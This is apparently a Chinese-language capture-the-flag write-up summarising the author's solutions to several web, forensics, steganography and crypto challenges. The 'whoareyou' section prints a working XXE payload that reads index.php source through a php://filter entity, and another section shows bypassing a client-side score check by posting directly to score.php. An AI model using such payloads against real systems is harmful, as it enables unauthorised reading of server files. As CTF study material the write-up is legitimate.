没能打进线下,记录一下除队友做的外我做的几道,留作温习。
签到题
nslookup -q=TXT gamectf.com
game
在cqg.js中有发送ajax。
if(score == 15){
$.ajax({
url: 'score.php',
type: 'POST',
data: 'score='+score,
success: function(data){
var data = data;
$("#output").text(data);
}
})
}
直接向score.php post score=5即可得到flag
whoareyou
抓包发现发送了xml请求,输入&加任意字符报错,联想到XXE漏洞,payload如下:<?xml version="1.0" encoding="utf-8"?><!DOCTYPE xxe [<!ELEMENT author ANY ><!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=index.php" >]><feedback><author>&xxe;</author></feedback>
flag就在源码内
七代目
gif修复,加上文件头后逐帧分离,得到flag
亚萨西
压缩包winhex打开发现文件尾密码,解开压缩包,分离包内图片,放入stegsove,得到ook编码,解码即为flag。
24word
图片为核心价值观编码,解码结果为压缩包密码,压缩包内有图片,扫描二维码可得flag。
sm4
用题目所给直接密文、密钥转16进制,再解密即可得flag。